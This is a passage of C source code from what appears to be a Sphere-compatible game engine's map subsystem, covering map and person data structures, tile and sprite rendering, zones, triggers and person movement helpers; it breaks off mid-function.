static color_t s_fade_color_to;
static int s_fade_frames;
static int s_fade_progress;
static int s_frame_rate = 0;
static unsigned int s_frames = 0;
static bool s_is_map_running = false;
static lstring_t* s_last_bgm_file = NULL;
static struct map* s_map = NULL;
static sound_t* s_map_bgm_stream = NULL;
static char* s_map_filename = NULL;
static int s_max_deferreds = 0;
static int s_max_persons = 0;
static unsigned int s_next_person_id = 0;
static int s_num_deferreds = 0;
static int s_num_persons = 0;
static struct map_trigger* s_on_trigger = NULL;
static unsigned int s_queued_id = 0;
static vector_t* s_person_list = NULL;
static struct player* s_players;
static script_t* s_render_script = NULL;
static int s_talk_button = 0;
static int s_talk_distance = 8;
static script_t* s_update_script = NULL;
static struct deferred *s_deferreds = NULL;
static person_t* *s_persons = NULL;
struct deferred
{
script_t* script;
int frames_left;
};
struct map
{
int width, height;
bool is_repeating;
point3_t origin;
lstring_t* bgm_file;
script_t* scripts[MAP_SCRIPT_MAX];
tileset_t* tileset;
vector_t* triggers;
vector_t* zones;
int num_layers;
int num_persons;
struct map_layer *layers;
struct map_person *persons;
};
struct map_layer
{
lstring_t* name;
bool is_parallax;
bool is_reflective;
bool is_visible;
float autoscroll_x;
float autoscroll_y;
color_t color_mask;
int height;
obsmap_t* obsmap;
float parallax_x;
float parallax_y;
script_t* render_script;
struct map_tile* tilemap;
int width;
};
struct map_person
{
lstring_t* name;
lstring_t* spriteset;
int x, y, z;
lstring_t* create_script;
lstring_t* destroy_script;
lstring_t* command_script;
lstring_t* talk_script;
lstring_t* touch_script;
};
struct map_tile
{
int tile_index;
int frames_left;
};
struct map_trigger
{
script_t* script;
int x, y, z;
};
struct map_zone
{
bool is_active;
rect_t bounds;
int interval;
int steps_left;
int layer;
script_t* script;
};
struct person
{
unsigned int id;
char* name;
int anim_frames;
char* direction;
int follow_distance;
int frame;
bool ignore_all_persons;
bool ignore_all_tiles;
vector_t* ignore_list;
bool is_persistent;
bool is_visible;
int layer;
person_t* leader;
color_t mask;
int mv_x, mv_y;
int revert_delay;
int revert_frames;
double scale_x;
double scale_y;
script_t* scripts[PERSON_SCRIPT_MAX];
double speed_x, speed_y;
spriteset_t* sprite;
double theta;
double x, y;
int x_offset, y_offset;
int max_commands;
int max_history;
int num_commands;
int num_ignores;
struct command *commands;
char* *ignores;
struct step *steps;
};
struct step
{
double x, y;
};
struct command
{
int type;
bool is_immediate;
script_t* script;
};
struct player
{
bool is_talk_allowed;
person_t* person;
int talk_key;
};
#pragma pack(push, 1)
struct rmp_header
{
char signature[4];
int16_t version;
uint8_t type;
int8_t num_layers;
uint8_t reserved_1;
int16_t num_entities;
int16_t start_x;
int16_t start_y;
int8_t start_layer;
int8_t start_direction;
int16_t num_strings;
int16_t num_zones;
uint8_t repeat_map;
uint8_t reserved[234];
};
struct rmp_entity_header
{
uint16_t x;
uint16_t y;
uint16_t z;
uint16_t type;
uint8_t reserved[8];
};
struct rmp_layer_header
{
int16_t width;
int16_t height;
uint16_t flags;
float parallax_x;
float parallax_y;
float scrolling_x;
float scrolling_y;
int32_t num_segments;
uint8_t is_reflective;
uint8_t reserved[3];
};
struct rmp_zone_header
{
uint16_t x1;
uint16_t y1;
uint16_t x2;
uint16_t y2;
uint16_t layer;
uint16_t interval;
uint8_t reserved[4];
};
#pragma pack(pop)
static bool change_map (const char* filename, bool preserve_persons);
static void command_person (person_t* person, int command);
static int compare_persons (const void* a, const void* b);
static void detach_person (const person_t* person);
static bool does_person_exist (const person_t* person);
static void draw_persons (int layer, bool is_flipped, int cam_x, int cam_y);
static bool enlarge_step_history (person_t* person, int new_size);
static void free_map (struct map* map);
static void free_person (person_t* person);
static struct map_trigger* get_trigger_at (int x, int y, int layer, int* out_index);
static struct map_zone* get_zone_at (int x, int y, int layer, int which, int* out_index);
static struct map* load_map (const char* path);
static void map_screen_to_layer (int layer, int camera_x, int camera_y, int* inout_x, int* inout_y);
static void map_screen_to_map (int camera_x, int camera_y, int* inout_x, int* inout_y);
static void process_map_input (void);
static void record_step (person_t* person);
static void reset_persons (bool keep_existing);
static void set_person_name (person_t* person, const char* name);
static void sort_persons (void);
static void update_map_engine (bool is_main_loop);
static void update_person (person_t* person, bool* out_has_moved);
void
map_engine_init(void)
{
int i;
console_log(1, "initializing map engine subsystem");
audio_init();
s_bgm_mixer = mixer_new(44100, 16, 2);
memset(s_def_map_scripts, 0, MAP_SCRIPT_MAX * sizeof(int));
memset(s_def_person_scripts, 0, PERSON_SCRIPT_MAX * sizeof(int));
s_map = NULL; s_map_filename = NULL;
s_camera_person = NULL;
s_players = calloc(PLAYER_MAX, sizeof(struct player));
for (i = 0; i < PLAYER_MAX; ++i)
s_players[i].is_talk_allowed = true;
s_current_trigger = -1;
s_current_zone = -1;
s_render_script = NULL;
s_update_script = NULL;
s_num_deferreds = s_max_deferreds = 0;
s_deferreds = NULL;
s_talk_button = 0;
s_is_map_running = false;
s_color_mask = mk_color(0, 0, 0, 0);
s_on_trigger = NULL;
s_num_persons = s_max_persons = 0;
s_persons = NULL;
s_talk_distance = 8;
s_acting_person = NULL;
s_current_person = NULL;
}
void
map_engine_uninit(void)
{
int i;
console_log(1, "shutting down map engine subsystem");
vector_free(s_person_list);
for (i = 0; i < s_num_deferreds; ++i)
script_unref(s_deferreds[i].script);
free(s_deferreds);
for (i = 0; i < MAP_SCRIPT_MAX; ++i)
script_unref(s_def_map_scripts[i]);
script_unref(s_update_script);
script_unref(s_render_script);
free_map(s_map);
free(s_players);
for (i = 0; i < s_num_persons; ++i)
free_person(s_persons[i]);
for (i = 0; i < PERSON_SCRIPT_MAX; ++i)
script_unref(s_def_person_scripts[i]);
free(s_persons);
mixer_unref(s_bgm_mixer);
audio_uninit();
}
void
map_engine_on_map_event(map_op_t op, script_t* script)
{
script_t* old_script;
old_script = s_def_map_scripts[op];
s_def_map_scripts[op] = script_ref(script);
script_unref(old_script);
}
void
map_engine_on_person_event(person_op_t op, script_t* script)
{
script_t* old_script;
old_script = s_def_person_scripts[op];
s_def_person_scripts[op] = script_ref(script);
script_unref(old_script);
}
void
map_engine_on_render(script_t* script)
{
script_unref(s_render_script);
s_render_script = script_ref(script);
}
void
map_engine_on_update(script_t* script)
{
script_unref(s_update_script);
s_update_script = script_ref(script);
}
const person_t*
map_engine_acting_person(void)
{
return s_acting_person;
}
const person_t*
map_engine_active_person(void)
{
return s_current_person;
}
int
map_engine_active_trigger(void)
{
return s_current_trigger;
}
int
map_engine_active_zone(void)
{
return s_current_zone;
}
vector_t*
map_engine_persons(void)
{
int i;
if (s_person_list == NULL)
s_person_list = vector_new(sizeof(person_t*));
vector_clear(s_person_list);
for (i = 0; i < s_num_persons; ++i)
vector_push(s_person_list, &s_persons[i]);
return s_person_list;
}
bool
map_engine_running(void)
{
return s_is_map_running;
}
int
map_engine_get_framerate(void)
{
return s_frame_rate;
}
person_t*
map_engine_get_player(player_id_t player_id)
{
return s_players[player_id].person;
}
person_t*
map_engine_get_subject(void)
{
return s_camera_person;
}
int
map_engine_get_talk_button(void)
{
return s_talk_button;
}
int
map_engine_get_talk_distance(void)
{
return s_talk_distance;
}
int
map_engine_get_talk_key(player_id_t player_id)
{
return s_players[player_id].talk_key;
}
void
map_engine_set_framerate(int framerate)
{
s_frame_rate = framerate;
}
void
map_engine_set_player(player_id_t player_id, person_t* person)
{
int i;
// detach person from any other players
for (i = 0; i < PLAYER_MAX; ++i) {
if (s_players[i].person == person)
s_players[i].person = NULL;
}
s_players[player_id].person = person;
}
void
map_engine_set_subject(person_t* person)
{
s_camera_person = person;
}
void
map_engine_set_talk_button(int button_id)
{
s_talk_button = button_id;
}
void
map_engine_set_talk_distance(int distance)
{
s_talk_distance = distance;
}
void
map_engine_set_talk_key(player_id_t player_id, int key)
{
s_players[player_id].talk_key = key;
}
bool
map_engine_change_map(const char* filename)
{
return change_map(filename, false);
}
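// map_engine_defer: schedules a script to run after `num_frames` map engine frames.
// the deferred list takes ownership of the script reference; update_map_engine() runs
// and unreferences each entry once its countdown reaches zero.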
void
map_engine_defer(script_t* script, int num_frames)
{
struct deferred* deferred;
if (++s_num_deferreds > s_max_deferreds) {
s_max_deferreds = s_num_deferreds * 2;
s_deferreds = realloc(s_deferreds, s_max_deferreds * sizeof(struct deferred));
}
deferred = &s_deferreds[s_num_deferreds - 1];
deferred->script = script;
deferred->frames_left = num_frames;
}
void
map_engine_draw_map(void)
{
bool is_repeating;
int cell_x;
int cell_y;
int first_cell_x;
int first_cell_y;
struct map_layer* layer;
int layer_height;
int layer_width;
size2_t resolution;
int tile_height;
int tile_index;
int tile_width;
int off_x;
int off_y;
int x, y, z;
if (screen_skipping_frame(g_screen))
return;
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_width, &tile_height);
// render map layers from bottom to top (+Z = up)
for (z = 0; z < s_map->num_layers; ++z) {
layer = &s_map->layers[z];
is_repeating = s_map->is_repeating || layer->is_parallax;
layer_width = layer->width * tile_width;
layer_height = layer->height * tile_height;
off_x = 0;
off_y = 0;
map_screen_to_layer(z, s_camera_x, s_camera_y, &off_x, &off_y);
// render person reflections if layer is reflective
al_hold_bitmap_drawing(true);
if (layer->is_reflective) {
if (is_repeating) { // for small repeating maps, persons need to be repeated as well
for (y = 0; y < resolution.height / layer_height + 2; ++y) for (x = 0; x < resolution.width / layer_width + 2; ++x)
draw_persons(z, true, off_x - x * layer_width, off_y - y * layer_height);
}
else {
draw_persons(z, true, off_x, off_y);
}
}
// render tiles, but only if the layer is visible
if (layer->is_visible) {
first_cell_x = off_x / tile_width;
first_cell_y = off_y / tile_height;
for (y = 0; y < resolution.height / tile_height + 2; ++y) for (x = 0; x < resolution.width / tile_width + 2; ++x) {
cell_x = is_repeating ? (x + first_cell_x) % layer->width : x + first_cell_x;
cell_y = is_repeating ? (y + first_cell_y) % layer->height : y + first_cell_y;
if (cell_x < 0 || cell_x >= layer->width || cell_y < 0 || cell_y >= layer->height)
continue;
tile_index = layer->tilemap[cell_x + cell_y * layer->width].tile_index;
tileset_draw(s_map->tileset, layer->color_mask, x * tile_width - off_x % tile_width, y * tile_height - off_y % tile_height, tile_index);
}
}
// render persons
if (is_repeating) { // for small repeating maps, persons need to be repeated as well
for (y = 0; y < resolution.height / layer_height + 2; ++y) for (x = 0; x < resolution.width / layer_width + 2; ++x)
draw_persons(z, false, off_x - x * layer_width, off_y - y * layer_height);
}
else {
draw_persons(z, false, off_x, off_y);
}
al_hold_bitmap_drawing(false);
script_run(layer->render_script, false);
}
al_draw_filled_rectangle(0, 0, resolution.width, resolution.height, nativecolor(s_color_mask));
script_run(s_render_script, false);
}
void
map_engine_exit(void)
{
s_exiting = true;
}
void
map_engine_fade_to(color_t color_mask, int num_frames)
{
if (num_frames > 0) {
s_fade_color_to = color_mask;
s_fade_color_from = s_color_mask;
s_fade_frames = num_frames;
s_fade_progress = 0;
}
else {
s_color_mask = color_mask;
s_fade_color_to = s_fade_color_from = color_mask;
s_fade_progress = s_fade_frames = 0;
}
}
bool
map_engine_start(const char* filename, int framerate)
{
s_is_map_running = true;
s_exiting = false;
s_color_mask = mk_color(0, 0, 0, 0);
s_fade_color_to = s_fade_color_from = s_color_mask;
s_fade_progress = s_fade_frames = 0;
al_clear_to_color(al_map_rgba(0, 0, 0, 255));
s_frame_rate = framerate;
if (!change_map(filename, true))
goto on_error;
while (!s_exiting && jsal_vm_enabled()) {
sphere_heartbeat(true, 1);
// order of operations matches Sphere 1.x. not sure why, but Sphere 1.x
// checks for input AFTER an update for some reason...
update_map_engine(true);
process_map_input();
map_engine_draw_map();
// don't clear the backbuffer. the Sphere 1.x map engine has a bug where it doesn't
		// clear the backbuffer between frames; as it turns out, a good deal of v1 code relies
// on that behavior.
sphere_tick(1, false, s_frame_rate);
}
reset_persons(false);
s_is_map_running = false;
return true;
on_error:
s_is_map_running = false;
return false;
}
void
map_engine_update(void)
{
update_map_engine(false);
}
rect_t
map_bounds(void)
{
rect_t bounds;
int tile_w, tile_h;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
bounds.x1 = 0; bounds.y1 = 0;
bounds.x2 = s_map->width * tile_w;
bounds.y2 = s_map->height * tile_h;
return bounds;
}
int
map_layer_by_name(const char* name)
{
int i;
for (i = 0; i < s_map->num_layers; ++i) {
		if (strcmp(name, lstr_cstr(s_map->layers[i].name)) == 0)
return i;
}
return -1;
}
int
map_num_layers(void)
{
return s_map->num_layers;
}
int
map_num_persons(void)
{
return s_num_persons;
}
int
map_num_triggers(void)
{
return vector_len(s_map->triggers);
}
int
map_num_zones(void)
{
return vector_len(s_map->zones);
}
point3_t
map_origin(void)
{
return s_map != NULL ? s_map->origin
: mk_point3(0, 0, 0);
}
const char*
map_pathname(void)
{
return s_map ? s_map_filename : NULL;
}
person_t*
map_person_by_name(const char* name)
{
int i;
for (i = 0; i < s_num_persons; ++i) {
if (strcmp(name, s_persons[i]->name) == 0)
return s_persons[i];
}
return NULL;
}
int
map_tile_at(int x, int y, int layer)
{
int layer_h;
int layer_w;
layer_w = s_map->layers[layer].width;
layer_h = s_map->layers[layer].height;
if (s_map->is_repeating || s_map->layers[layer].is_parallax) {
x = (x % layer_w + layer_w) % layer_w;
y = (y % layer_h + layer_h) % layer_h;
}
if (x < 0 || y < 0 || x >= layer_w || y >= layer_h)
return -1;
return layer_get_tile(layer, x, y);
}
tileset_t*
map_tileset(void)
{
return s_map->tileset;
}
int
map_trigger_at(int x, int y, int layer)
{
rect_t bounds;
int tile_w, tile_h;
struct map_trigger* trigger;
iter_t iter;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
iter = vector_enum(s_map->triggers);
while ((trigger = iter_next(&iter))) {
if (trigger->z != layer && false) // layer ignored for compatibility
continue;
bounds.x1 = trigger->x - tile_w / 2;
bounds.y1 = trigger->y - tile_h / 2;
bounds.x2 = bounds.x1 + tile_w;
bounds.y2 = bounds.y1 + tile_h;
if (is_point_in_rect(x, y, bounds))
return iter.index;
}
return -1;
}
point2_t
map_xy_from_screen(point2_t screen_xy)
{
int x;
int y;
x = screen_xy.x;
y = screen_xy.y;
map_screen_to_map(s_camera_x, s_camera_y, &x, &y);
return mk_point2(x, y);
}
int
map_zone_at(int x, int y, int layer, int which)
{
struct map_zone* zone;
iter_t iter;
iter = vector_enum(s_map->zones);
while ((zone = iter_next(&iter))) {
if (zone->layer != layer && false) // layer ignored for compatibility
continue;
if (is_point_in_rect(x, y, zone->bounds) && --which < 0)
return iter.index;
}
return -1;
}
point2_t
map_get_camera_xy(void)
{
return mk_point2(s_camera_x, s_camera_y);
}
void
map_set_camera_xy(point2_t where)
{
s_camera_x = where.x;
s_camera_y = where.y;
}
void
map_activate(map_op_t op, bool use_default)
{
if (use_default)
script_run(s_def_map_scripts[op], false);
script_run(s_map->scripts[op], false);
}
bool
map_add_trigger(int x, int y, int layer, script_t* script)
{
struct map_trigger trigger;
console_log(2, "creating trigger #%d on map '%s'", vector_len(s_map->triggers), s_map_filename);
console_log(3, " location: '%s' @ (%d,%d)", lstr_cstr(s_map->layers[layer].name), x, y);
trigger.x = x; trigger.y = y;
trigger.z = layer;
trigger.script = script_ref(script);
if (!vector_push(s_map->triggers, &trigger))
return false;
return true;
}
bool
map_add_zone(rect_t bounds, int layer, script_t* script, int steps)
{
struct map_zone zone;
console_log(2, "creating %u-step zone #%d on map '%s'", steps, vector_len(s_map->zones), s_map_filename);
console_log(3, " bounds: (%d,%d)-(%d,%d)", bounds.x1, bounds.y1, bounds.x2, bounds.y2);
memset(&zone, 0, sizeof(struct map_zone));
zone.bounds = bounds;
zone.layer = layer;
zone.script = script_ref(script);
zone.interval = steps;
zone.steps_left = 0;
if (!vector_push(s_map->zones, &zone))
return false;
return true;
}
void
map_call_default(map_op_t op)
{
script_run(s_def_map_scripts[op], false);
}
void
map_normalize_xy(double* inout_x, double* inout_y, int layer)
{
int tile_w, tile_h;
int layer_w, layer_h;
if (s_map == NULL)
return; // can't normalize if no map loaded
if (!s_map->is_repeating && !s_map->layers[layer].is_parallax)
return;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
layer_w = s_map->layers[layer].width * tile_w;
layer_h = s_map->layers[layer].height * tile_h;
if (inout_x)
*inout_x = fmod(fmod(*inout_x, layer_w) + layer_w, layer_w);
if (inout_y)
*inout_y = fmod(fmod(*inout_y, layer_h) + layer_h, layer_h);
}
void
map_remove_trigger(int trigger_index)
{
vector_remove(s_map->triggers, trigger_index);
}
void
map_remove_zone(int zone_index)
{
vector_remove(s_map->zones, zone_index);
}
void
layer_on_render(int layer, script_t* script)
{
script_unref(s_map->layers[layer].render_script);
s_map->layers[layer].render_script = script_ref(script);
}
const char*
layer_name(int layer)
{
return lstr_cstr(s_map->layers[layer].name);
}
const obsmap_t*
layer_obsmap(int layer)
{
return s_map->layers[layer].obsmap;
}
size2_t
layer_size(int layer)
{
struct map_layer* layer_data;
layer_data = &s_map->layers[layer];
return mk_size2(layer_data->width, layer_data->height);
}
color_t
layer_get_color_mask(int layer)
{
return s_map->layers[layer].color_mask;
}
bool
layer_get_reflective(int layer)
{
return s_map->layers[layer].is_reflective;
}
int
layer_get_tile(int layer, int x, int y)
{
struct map_tile* tile;
int width;
width = s_map->layers[layer].width;
tile = &s_map->layers[layer].tilemap[x + y * width];
return tile->tile_index;
}
bool
layer_get_visible(int layer)
{
return s_map->layers[layer].is_visible;
}
void
layer_set_color_mask(int layer, color_t color)
{
s_map->layers[layer].color_mask = color;
}
void
layer_set_reflective(int layer, bool reflective)
{
s_map->layers[layer].is_reflective = reflective;
}
void
layer_set_tile(int layer, int x, int y, int tile_index)
{
struct map_tile* tile;
int width;
width = s_map->layers[layer].width;
tile = &s_map->layers[layer].tilemap[x + y * width];
tile->tile_index = tile_index;
tile->frames_left = tileset_get_delay(s_map->tileset, tile_index);
}
void
layer_set_visible(int layer, bool visible)
{
s_map->layers[layer].is_visible = visible;
}
void
layer_replace_tiles(int layer, int old_index, int new_index)
{
int layer_h;
int layer_w;
struct map_tile* tile;
int i_x, i_y;
layer_w = s_map->layers[layer].width;
layer_h = s_map->layers[layer].height;
for (i_x = 0; i_x < layer_w; ++i_x) for (i_y = 0; i_y < layer_h; ++i_y) {
tile = &s_map->layers[layer].tilemap[i_x + i_y * layer_w];
if (tile->tile_index == old_index)
tile->tile_index = new_index;
}
}
bool
layer_resize(int layer, int x_size, int y_size)
{
int old_height;
int old_width;
struct map_tile* tile;
int tile_width;
int tile_height;
struct map_tile* tilemap;
struct map_trigger* trigger;
struct map_zone* zone;
int x, y, i;
old_width = s_map->layers[layer].width;
old_height = s_map->layers[layer].height;
	// allocate a new tilemap and copy the old layer tiles into it. we can't simply
	// realloc because resizing the layer changes the row stride of the tilemap.
if (!(tilemap = malloc(x_size * y_size * sizeof(struct map_tile))))
return false;
for (x = 0; x < x_size; ++x) {
for (y = 0; y < y_size; ++y) {
if (x < old_width && y < old_height) {
tilemap[x + y * x_size] = s_map->layers[layer].tilemap[x + y * old_width];
}
else {
tile = &tilemap[x + y * x_size];
tile->frames_left = tileset_get_delay(s_map->tileset, 0);
tile->tile_index = 0;
}
}
}
// free the old tilemap and substitute the new one
free(s_map->layers[layer].tilemap);
s_map->layers[layer].tilemap = tilemap;
s_map->layers[layer].width = x_size;
s_map->layers[layer].height = y_size;
// if we resize the largest layer, the overall map size will change.
	// recalculate it.
tileset_get_size(s_map->tileset, &tile_width, &tile_height);
s_map->width = 0;
s_map->height = 0;
for (i = 0; i < s_map->num_layers; ++i) {
if (!s_map->layers[i].is_parallax) {
s_map->width = fmax(s_map->width, s_map->layers[i].width * tile_width);
s_map->height = fmax(s_map->height, s_map->layers[i].height * tile_height);
}
}
// ensure zones and triggers remain in-bounds. if any are completely
// out-of-bounds, delete them.
for (i = (int)vector_len(s_map->zones) - 1; i >= 0; --i) {
zone = vector_get(s_map->zones, i);
if (zone->bounds.x1 >= s_map->width || zone->bounds.y1 >= s_map->height)
vector_remove(s_map->zones, i);
else {
if (zone->bounds.x2 > s_map->width)
zone->bounds.x2 = s_map->width;
if (zone->bounds.y2 > s_map->height)
zone->bounds.y2 = s_map->height;
}
}
for (i = (int)vector_len(s_map->triggers) - 1; i >= 0; --i) {
trigger = vector_get(s_map->triggers, i);
if (trigger->x >= s_map->width || trigger->y >= s_map->height)
vector_remove(s_map->triggers, i);
}
return true;
}
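// person_new: creates a person at the map origin, adds it to the global person array,
// runs its creation script (the default handler plus the per-person script, if any),
// and re-sorts the draw order.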
person_t*
person_new(const char* name, spriteset_t* spriteset, bool is_persistent, script_t* create_script)
{
point3_t origin = map_origin();
person_t* person;
if (++s_num_persons > s_max_persons) {
s_max_persons = s_num_persons * 2;
s_persons = realloc(s_persons, s_max_persons * sizeof(person_t*));
}
person = s_persons[s_num_persons - 1] = calloc(1, sizeof(person_t));
person->id = s_next_person_id++;
person->sprite = spriteset_ref(spriteset);
set_person_name(person, name);
person_set_pose(person, spriteset_pose_name(spriteset, 0));
person->is_persistent = is_persistent;
person->is_visible = true;
person->x = origin.x;
person->y = origin.y;
person->layer = origin.z;
person->speed_x = 1.0;
person->speed_y = 1.0;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, 0);
person->mask = mk_color(255, 255, 255, 255);
person->scale_x = person->scale_y = 1.0;
person->scripts[PERSON_SCRIPT_ON_CREATE] = create_script;
person_activate(person, PERSON_SCRIPT_ON_CREATE, NULL, true);
sort_persons();
return person;
}
void
person_free(person_t* person)
{
int i, j;
// call the person's destroy script *before* renouncing leadership.
// the destroy script may want to reassign followers (they will be orphaned otherwise), so
// we want to give it a chance to do so.
person_activate(person, PERSON_SCRIPT_ON_DESTROY, NULL, true);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader == person)
s_persons[i]->leader = NULL;
}
// remove the person from the engine
detach_person(person);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i] == person) {
for (j = i; j < s_num_persons - 1; ++j)
s_persons[j] = s_persons[j + 1];
--s_num_persons;
--i;
}
}
vector_free(person->ignore_list);
free_person(person);
sort_persons();
}
rect_t
person_base(const person_t* person)
{
rect_t base_rect;
int base_x;
int base_y;
double x;
double y;
base_rect = rect_zoom(spriteset_get_base(person->sprite), person->scale_x, person->scale_y);
person_get_xy(person, &x, &y, true);
base_x = x - (base_rect.x1 + (base_rect.x2 - base_rect.x1) / 2);
base_y = y - (base_rect.y1 + (base_rect.y2 - base_rect.y1) / 2);
base_rect.x1 += base_x; base_rect.x2 += base_x;
base_rect.y1 += base_y; base_rect.y2 += base_y;
return base_rect;
}
bool
person_following(const person_t* person, const person_t* leader)
{
const person_t* node;
node = person;
while ((node = node->leader))
if (node == leader) return true;
return false;
}
bool
person_has_moved(const person_t* person)
{
return person->mv_x != 0 || person->mv_y != 0;
}
vector_t*
person_ignore_list(person_t* person)
{
// note: the returned vector is an array of C strings. these should be treated
// as const char*; in other words, don't free them!
int i;
if (person->ignore_list == NULL)
person->ignore_list = vector_new(sizeof(const char*));
vector_clear(person->ignore_list);
for (i = 0; i < person->num_ignores; ++i)
vector_push(person->ignore_list, &person->ignores[i]);
return person->ignore_list;
}
bool
person_ignored_by(const person_t* person, const person_t* other)
{
// note: commutative; if either person ignores the other, the function will return true
int i;
if (other->ignore_all_persons || person->ignore_all_persons)
return true;
for (i = 0; i < other->num_ignores; ++i)
if (strcmp(other->ignores[i], person->name) == 0) return true;
for (i = 0; i < person->num_ignores; ++i)
if (strcmp(person->ignores[i], other->name) == 0) return true;
return false;
}
bool
person_moving(const person_t* person)
{
return person->num_commands > 0;
}
const char*
person_name(const person_t* person)
{
return person != NULL ? person->name : "";
}
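// person_obstructed_at: tests whether `person` would be obstructed if its sprite base
// were moved to (x, y). three checks are made in order: overlap with other persons'
// bases (unless persons are ignored), the layer's map-defined obstruction lines, and
// the obsmaps of tiles in the immediate vicinity of the base.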
bool
person_obstructed_at(const person_t* person, double x, double y, person_t** out_obstructing_person, int* out_tile_index)
{
rect_t area;
rect_t base, my_base;
double cur_x, cur_y;
bool is_obstructed = false;
int layer;
const obsmap_t* obsmap;
int tile_w, tile_h;
const tileset_t* tileset;
int i, i_x, i_y;
map_normalize_xy(&x, &y, person->layer);
person_get_xyz(person, &cur_x, &cur_y, &layer, true);
my_base = rect_translate(person_base(person), x - cur_x, y - cur_y);
if (out_obstructing_person != NULL)
*out_obstructing_person = NULL;
if (out_tile_index != NULL)
*out_tile_index = -1;
// check for obstructing persons
if (!person->ignore_all_persons) {
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i] == person) // these persons aren't going to obstruct themselves!
continue;
if (s_persons[i]->layer != layer)
continue; // ignore persons not on the same layer
if (person_following(s_persons[i], person))
continue; // ignore own followers
base = person_base(s_persons[i]);
if (do_rects_overlap(my_base, base) && !person_ignored_by(person, s_persons[i])) {
is_obstructed = true;
if (out_obstructing_person)
*out_obstructing_person = s_persons[i];
break;
}
}
}
// no obstructing person, check map-defined obstructions
obsmap = layer_obsmap(layer);
if (obsmap_test_rect(obsmap, my_base))
is_obstructed = true;
// check for obstructing tiles
// for performance reasons, the search is constrained to the immediate vicinity
// of the person's sprite base.
if (!person->ignore_all_tiles) {
tileset = map_tileset();
tileset_get_size(tileset, &tile_w, &tile_h);
area.x1 = my_base.x1 / tile_w;
area.y1 = my_base.y1 / tile_h;
area.x2 = area.x1 + (my_base.x2 - my_base.x1) / tile_w + 2;
area.y2 = area.y1 + (my_base.y2 - my_base.y1) / tile_h + 2;
for (i_x = area.x1; i_x < area.x2; ++i_x) for (i_y = area.y1; i_y < area.y2; ++i_y) {
base = rect_translate(my_base, -(i_x * tile_w), -(i_y * tile_h));
obsmap = tileset_obsmap(tileset, map_tile_at(i_x, i_y, layer));
if (obsmap != NULL && obsmap_test_rect(obsmap, base)) {
is_obstructed = true;
if (out_tile_index)
*out_tile_index = map_tile_at(i_x, i_y, layer);
break;
}
}
}
return is_obstructed;
}
double
person_get_angle(const person_t* person)
{
return person->theta;
}
color_t
person_get_color(const person_t* person)
{
return person->mask;
}
int
person_get_frame(const person_t* person)
{
int num_frames;
num_frames = spriteset_num_frames(person->sprite, person->direction);
return person->frame % num_frames;
}
int
person_get_frame_delay(const person_t* person)
{
return person->anim_frames;
}
bool
person_get_ignore_persons(const person_t* person)
{
return person->ignore_all_persons;
}
bool
person_get_ignore_tiles(const person_t* person)
{
return person->ignore_all_tiles;
}
int
person_get_layer(const person_t* person)
{
return person->layer;
}
person_t*
person_get_leader(const person_t* person)
{
return person->leader;
}
point2_t
person_get_offset(const person_t* person)
{
return mk_point2(person->x_offset, person->y_offset);
}
const char*
person_get_pose(const person_t* person)
{
return person->direction;
}
int
person_get_revert_delay(const person_t* person)
{
return person->revert_delay;
}
void
person_get_scale(const person_t* person, double* out_scale_x, double* out_scale_y)
{
*out_scale_x = person->scale_x;
*out_scale_y = person->scale_y;
}
void
person_get_speed(const person_t* person, double* out_x_speed, double* out_y_speed)
{
if (out_x_speed) *out_x_speed = person->speed_x;
if (out_y_speed) *out_y_speed = person->speed_y;
}
spriteset_t*
person_get_spriteset(const person_t* person)
{
return person->sprite;
}
int
person_get_trailing(const person_t* person)
{
return person->follow_distance;
}
bool
person_get_visible(const person_t* person)
{
return person->is_visible;
}
void
person_get_xy(const person_t* person, double* out_x, double* out_y, bool normalize)
{
*out_x = person->x;
*out_y = person->y;
if (normalize)
map_normalize_xy(out_x, out_y, person->layer);
}
void
person_get_xyz(const person_t* person, double* out_x, double* out_y, int* out_layer, bool normalize)
{
*out_x = person->x;
*out_y = person->y;
*out_layer = person->layer;
if (normalize)
map_normalize_xy(out_x, out_y, *out_layer);
}
void
person_set_angle(person_t* person, double theta)
{
person->theta = theta;
}
void
person_set_color(person_t* person, color_t mask)
{
person->mask = mask;
}
void
person_set_frame(person_t* person, int frame_index)
{
int num_frames;
num_frames = spriteset_num_frames(person->sprite, person->direction);
person->frame = (frame_index % num_frames + num_frames) % num_frames;
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, person->frame);
person->revert_frames = person->revert_delay;
}
void
person_set_frame_delay(person_t* person, int num_frames)
{
person->anim_frames = num_frames;
person->revert_frames = person->revert_delay;
}
void
person_set_ignore_persons(person_t* person, bool ignoring)
{
person->ignore_all_persons = ignoring;
}
void
person_set_ignore_tiles (person_t* person, bool ignoring)
{
person->ignore_all_tiles = ignoring;
}
void
person_set_layer(person_t* person, int layer)
{
person->layer = layer;
}
bool
person_set_leader(person_t* person, person_t* leader, int distance)
{
const person_t* node;
// prevent circular follower chains from forming
if (leader != NULL) {
node = leader;
do {
if (node == person)
return false;
} while ((node = node->leader));
}
// add the person as a follower (or sever existing link if leader==NULL)
if (leader != NULL) {
if (!enlarge_step_history(leader, distance))
return false;
person->leader = leader;
person->follow_distance = distance;
}
person->leader = leader;
return true;
}
void
person_set_offset(person_t* person, point2_t offset)
{
person->x_offset = offset.x;
person->y_offset = offset.y;
}
void
person_set_pose(person_t* person, const char* pose_name)
{
person->direction = realloc(person->direction, (strlen(pose_name) + 1) * sizeof(char));
strcpy(person->direction, pose_name);
}
void
person_set_revert_delay(person_t* person, int num_frames)
{
person->revert_delay = num_frames;
person->revert_frames = num_frames;
}
void
person_set_scale(person_t* person, double scale_x, double scale_y)
{
person->scale_x = scale_x;
person->scale_y = scale_y;
}
void
person_set_speed(person_t* person, double x_speed, double y_speed)
{
person->speed_x = x_speed;
person->speed_y = y_speed;
}
void
person_set_spriteset(person_t* person, spriteset_t* spriteset)
{
spriteset_t* old_spriteset;
old_spriteset = person->sprite;
person->sprite = spriteset_ref(spriteset);
person->anim_frames = spriteset_frame_delay(person->sprite, person->direction, 0);
person->frame = 0;
spriteset_unref(old_spriteset);
}
void
person_set_trailing(person_t* person, int distance)
{
enlarge_step_history(person->leader, distance);
